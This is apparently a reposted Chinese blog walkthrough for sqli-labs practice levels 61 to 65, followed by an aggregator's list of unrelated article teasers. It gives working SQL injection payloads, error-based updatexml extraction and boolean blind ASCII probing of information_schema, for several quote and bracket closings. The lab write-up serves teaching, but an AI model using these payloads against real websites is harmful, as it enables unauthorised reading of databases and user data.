sqli-labs靶场通关攻略(61-65)

news2024/9/20 16:37:47

Less-61

步骤一:查看数据库

?id=1')) and updatexml(1,concat(1,(select database())),1)--+

步骤二:查看表名

?id=1')) and updatexml(1,concat(1,(select group_concat(table_name) from information_schema.tables where table_schema='security')),1)--+

步骤三:查看users表中列名

?id=1')) and updatexml(1,concat(1,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users')),1)--+

Less-62

步骤一:查看数据库

判断数据库的第一个字符:

用ascii码截取数据库的第一位字符 判断第一位字符的ascii码是否大于98 页面显示正常 说明数据库第一位字符ascii码大于98

?id=1') and ascii(substr(database(),1,1))>98--+

判断数据库第一位字符的ascii码是否大于99 页面显示异常 说明不大于 大于98不大于99 说明第一位字符ascii码等于99

?id=1') and ascii(substr(database(),1,1))>99--+

...................................................最终得出challengs

步骤二:查security数据库中第一张表的第一位字符

?id=1') and ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1))>100--+

?id=1') and ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1))>101--+

大于100不大于101 说明第一张表的第一位字符等于101 'e' 。

................................最终得出第一张表的表名为emails

步骤三:查看users表中第一个字段的第一位字符

?id=1') and ascii(substr((select column_name from information_schema.columns where table_schema='security' and table_name='users' limit 0,1),1,1))>104--+

?id=1') and ascii(substr((select column_name from information_schema.columns where table_schema='security' and table_name='users' limit 0,1),1,1))>105--+

说明users表的第一个字段的第一位字符ascii码为105 'i'

............最终得出users表的第一个字段为id

Less-63

步骤一:查看数据库

判断数据库的第一个字符:

用ascii码截取数据库的第一位字符 判断第一位字符的ascii码是否大于98 页面显示正常 说明数据库第一位字符ascii码大于98

?id=1' and ascii(substr(database(),1,1))>98--+

判断数据库第一位字符的ascii码是否大于99 页面显示异常 说明不大于 大于98不大于99 说明第一位字符ascii码等于99

?id=1' and ascii(substr(database(),1,1))>99--+

...................................................最终得出challengs

步骤二:查security数据库中第一张表的第一位字符

?id=1' and ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1))>100--+

?id=1' and ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1))>101--+

大于100不大于101 说明第一张表的第一位字符等于101 'e' 。

................................最终得出第一张表的表名为emails

步骤三:查看users表中第一个字段的第一位字符

?id=1' and ascii(substr((select column_name from information_schema.columns where table_schema='security' and table_name='users' limit 0,1),1,1))>104--+

?id=1' and ascii(substr((select column_name from information_schema.columns where table_schema='security' and table_name='users' limit 0,1),1,1))>105--+

说明users表的第一个字段的第一位字符ascii码为105 'i'

............最终得出users表的第一个字段为id

Less-64

步骤一:查看数据库

判断数据库的第一个字符:

用ascii码截取数据库的第一位字符 判断第一位字符的ascii码是否大于98 页面显示正常 说明数据库第一位字符ascii码大于98

?id=1)) and ascii(substr(database(),1,1))>98--+

判断数据库第一位字符的ascii码是否大于99 页面显示异常 说明不大于 大于98不大于99 说明第一位字符ascii码等于99

?id=1)) and ascii(substr(database(),1,1))>99--+

...................................................最终得出challengs

步骤二:查security数据库中第一张表的第一位字符

?id=1)) and ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1))>100--+

?id=1)) and ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1))>101--+

大于100不大于101 说明第一张表的第一位字符等于101 'e' 。

................................最终得出第一张表的表名为emails

步骤三:查看users表中第一个字段的第一位字符

?id=1)) and ascii(substr((select column_name from information_schema.columns where table_schema='security' and table_name='users' limit 0,1),1,1))>104--+

?id=1)) and ascii(substr((select column_name from information_schema.columns where table_schema='security' and table_name='users' limit 0,1),1,1))>105--+

说明users表的第一个字段的第一位字符ascii码为105 'i'

............最终得出users表的第一个字段为id

Less-65

步骤一:查看数据库

判断数据库的第一个字符:

用ascii码截取数据库的第一位字符 判断第一位字符的ascii码是否大于98 页面显示正常 说明数据库第一位字符ascii码大于98

?id=1") and ascii(substr(database(),1,1))>98--+

判断数据库第一位字符的ascii码是否大于99 页面显示异常 说明不大于 大于98不大于99 说明第一位字符ascii码等于99

?id=1") and ascii(substr(database(),1,1))>99--+

...................................................最终得出challengs

步骤二:查security数据库中第一张表的第一位字符

?id=1") and ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1))>100--+

?id=1") and ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1))>101--+

大于100不大于101 说明第一张表的第一位字符等于101 'e' 。

................................最终得出第一张表的表名为emails

步骤三:查看users表中第一个字段的第一位字符

?id=1") and ascii(substr((select column_name from information_schema.columns where table_schema='security' and table_name='users' limit 0,1),1,1))>104--+

?id=1") and ascii(substr((select column_name from information_schema.columns where table_schema='security' and table_name='users' limit 0,1),1,1))>105--+

说明users表的第一个字段的第一位字符ascii码为105 'i'

............最终得出users表的第一个字段为id

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/2100841.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

【专题】2024年中国游戏出海洞察报告合集PDF分享(附原数据表)

【专题】2024年中国游戏出海洞察报告合集PDF分享(附原数据表)

原文链接:https://tecdat.cn/?p37570 2023 年全球游戏市场规模高达 6205.2 亿美元,且预计未来持续增长,这清晰地展示了该市场的巨大潜力和良好前景。 中国游戏在全球移动游戏市场的份额于 2023 年已达 37%,产业贡献超 30% 的市场…
阅读更多...
手动添加jar包到本地仓库

手动添加jar包到本地仓库

依赖包不存在于任何的maven仓库中,所以要手工添加进本地仓库,过程如下: 将EasyModbusJava.jar包复制到maven目录的 bin目录下;执行cmd到该bin目录路径下执行以下指令 mvn install:install-file -DfileEasyModbusJava.jar -Dgroup…
阅读更多...
C++笔记15•数据结构:二叉树之二叉搜索树•

C++笔记15•数据结构:二叉树之二叉搜索树•

二叉搜索树 1.二叉搜索树 概念: 二叉搜索树又称二叉排序树也叫二叉查找树,它可以是一棵空树。 二叉树具有以下性质: 若它的左子树不为空,则左子树上所有节点的值都小于根节点的值 若它的右子树不为空,则右子树上所有节点的值都…
阅读更多...
STM32CubeMX CAN收发数据

STM32CubeMX CAN收发数据

目录 一、CAN总线 1. 差分信号 2. CAN收发器 3. CAN帧结构 4. CAN波特率设置 5. 标识符筛选 二、CubeMX配置 三、Keil代码 一、CAN总线 CAN(Controller Area Network,控制器局域网络)是一种用于车辆、工业自动化等领域的通信协议&…
阅读更多...
数分基础(05)中心极限定理、假设检验与AB测试简介

数分基础(05)中心极限定理、假设检验与AB测试简介

文章目录 1. 中心极限定理1.1 概念1.2 直观理解1.3 重要性 2. 示例2.1 数据集2.2 验证思路(1)获取一个样本均值(2)假设抽取1000次(3)增大样本容量 2.3 实现2.4 结果 2. 假设检验2.1 总体思路2.2 比较两种运…
阅读更多...
环信高质量全球网络——70%丢包环境,消息100%送达,抗弱网能力大幅提升!

环信高质量全球网络——70%丢包环境,消息100%送达,抗弱网能力大幅提升!

在当今数字化时代,稳定而高效的即时通讯已成为企业和个人不可或缺的工具。环信即时通讯(IM)云服务一直致力于为用户提供优质的通信体验。如今,环信IM通过自研传输协议,实现了在弱网环境下的卓越表现,确保消…
阅读更多...
.NET 一款具备签名用于绕过防护的工具

.NET 一款具备签名用于绕过防护的工具

01阅读须知 此文所提供的信息只为网络安全人员对自己所负责的网站、服务器等(包括但不限于)进行检测或维护参考,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失&#xf…
阅读更多...
踩坑-pycharm-终端闪退

踩坑-pycharm-终端闪退

问题: pycharm打开终端,终端直接闪退,打开其他项目,没事 原因: 之前在其他项目下载了allure,不知道怎么终端的path改了 解决: 此处,终端路径修改为如下即可:
阅读更多...
HTML+CSS+Query实现二级菜单

HTML+CSS+Query实现二级菜单

在网页设计中&#xff0c;导航菜单是非常重要的部分之一&#xff0c;尤其是具有二级下拉菜单的导航栏&#xff0c;可以提升用户体验。本文将通过HTML、CSS和jQuery实现一个具有二级菜单标题的导航栏&#xff0c;并详细讲解每一步的实现过程。 <!DOCTYPE html> <html …
阅读更多...
[数据集][目标检测]街头摊贩识别检测数据集VOC+YOLO格式758张1类别

[数据集][目标检测]街头摊贩识别检测数据集VOC+YOLO格式758张1类别

数据集格式&#xff1a;Pascal VOC格式YOLO格式(不包含分割路径的txt文件&#xff0c;仅仅包含jpg图片以及对应的VOC格式xml文件和yolo格式txt文件) 图片数量(jpg文件个数)&#xff1a;758 标注数量(xml文件个数)&#xff1a;758 标注数量(txt文件个数)&#xff1a;758 标注类别…
阅读更多...
信捷 XD PLC 双精度浮点数的初始化及传输

信捷 XD PLC 双精度浮点数的初始化及传输

在用信捷XDH PLC进行运动控制时&#xff0c;加减速时间是个64位的双精度的浮点数&#xff0c;那么如果不在人机界面写到PLC&#xff0c;PLC自身也是可以初始化的&#xff0c;比如0.005,怎么办呢。 用FLT指令把 整数出单精度浮点数&#xff0c;然后EDIV指令把两个单精度浮点数相…
阅读更多...
2025第五届广州国际新能源汽车产业智能制造技术展览会

2025第五届广州国际新能源汽车产业智能制造技术展览会

2025第五届广州国际新能源汽车产业智能制造技术展览会 展会时间&#xff1a;2025年11月20日-22日 展会地点&#xff1a;广州保利世贸博览馆(PWTC Expo) 主题&#xff1a;能源绿色化&#xff0c;制造低碳化 400多家参展商&#xff1b;20000多名观众&#xff1b;20000平方米展出…
阅读更多...
mysql索引,事务,约束

mysql索引,事务,约束

MySQL事务 1.什么事务 用于保证数据的一致性,它是由一组相关的dml语句组成,该租的dml语句要么全部成功要么全部失败. 2.事务和锁 当执行事务操作时(dml),MySQL会在表上加锁,防止其它用户改表的数据,这对用户来说很重要 mysql 数据库控制台事务的几个重要操作(基本操作 tra…
阅读更多...
鸿蒙开发—黑马云音乐之播放页面(下)

鸿蒙开发—黑马云音乐之播放页面(下)

目录 1.用户随意控制播放进度 2.歌曲暂停和播放控制和歌曲上一首、下一首播放控制 3.歌曲列表 4.歌曲列表数据动态化和背景雾化 5.唱针效果 6.结语 1.用户随意控制播放进度 src/main/ets/services/AvPlayerManager.ets&#xff1a; // 让播放对象从某个时间点开始播放 …
阅读更多...
本地大语言模型部署及应用

本地大语言模型部署及应用

01 模型 2024-07-24&#xff0c;Meta 正式发布新一代开源大模型 Llama 3.1 系列&#xff0c;该模型共有三个版本&#xff1a; 8B70B405B meta评估了超过 150 个语言覆盖范围广的基准数据集。比较了 Llama 3.1 与竞争性模型在真实世界场景下的表现。实验评估表明&#xff0c;L…
阅读更多...
动态住宅IP代理的搭建指南:实现高效网络访问

动态住宅IP代理的搭建指南:实现高效网络访问

在互联网的复杂环境中&#xff0c;动态住宅IP代理逐渐成为提升网络隐私和绕过IP限制的热门选择。相比于数据中心代理IP&#xff0c;动态住宅IP代理具有更高的隐蔽性和真实性&#xff0c;能够有效模拟真实用户的网络行为。本文将详细介绍动态住宅IP代理的搭建方法&#xff0c;帮…
阅读更多...
iPhone、微信二选一?苹果、腾讯官方回应

iPhone、微信二选一?苹果、腾讯官方回应

KlipC报道&#xff1a;9月2日&#xff0c;有消息称&#xff0c;腾讯和苹果正在就APPStore的抽成问题在不断交涉&#xff0c;如若谈崩有可能导致微信下架&#xff0c;iPhone一旦升级到 iOS 18.2 系统可能将无法使用微信。 对此&#xff0c;苹果中国区技术顾问表示&#xff0c;“…
阅读更多...
Vue 2 与 Vue 3 中 keep-alive 组件的深入解析

Vue 2 与 Vue 3 中 keep-alive 组件的深入解析

更多内容前往个人网站&#xff1a;孔乙己大叔 在 Vue.js 的开发中&#xff0c;keep-alive 是一个非常重要的内置组件&#xff0c;它允许我们将组件状态或实例保持在内存中&#xff0c;避免重新渲染和重新创建组件&#xff0c;这对于需要频繁切换但内容较为复杂的组件场景非常有…
阅读更多...
如何在银河麒麟中快速查询网卡固件及驱动信息

如何在银河麒麟中快速查询网卡固件及驱动信息

如何在银河麒麟中快速查询网卡固件及驱动信息 1、第一步&#xff1a;找到网卡名称2、第二步&#xff1a;查询固件和驱动信息3、总结 &#x1f496;The Begin&#x1f496;点点关注&#xff0c;收藏不迷路&#x1f496; 在银河麒麟服务器操作系统中&#xff0c;如何查询网卡固件…
阅读更多...
统一NLP和目标检测的DETR(一)——self attention、encoder、decoder

统一NLP和目标检测的DETR(一)——self attention、encoder、decoder

主流目标检测算法劣势 YOLO系列&#xff0c;它基于anchor来做&#xff0c;少不了要用MNS&#xff0c;导致速度相对较慢。 但今天介绍一款DETR&#xff0c;基于VIT的目标检测算法。 那么我们需要先深入过一遍VIT。 Vision transform 1、传统RNN网络的问题 单向&#xff1a;只…
阅读更多...
推荐文章
最新文章

Copyright @ 2022~2023